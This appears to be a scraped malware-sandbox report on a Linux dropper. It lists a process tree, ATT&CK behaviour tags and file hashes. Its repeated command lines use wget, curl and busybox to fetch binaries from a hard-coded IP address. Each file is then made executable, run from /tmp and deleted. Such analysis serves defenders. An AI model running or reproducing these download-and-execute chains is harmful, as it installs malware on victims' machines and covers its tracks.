/usr/bin/curlcurl -O http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:881
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:889
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:895
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:901
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:905
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97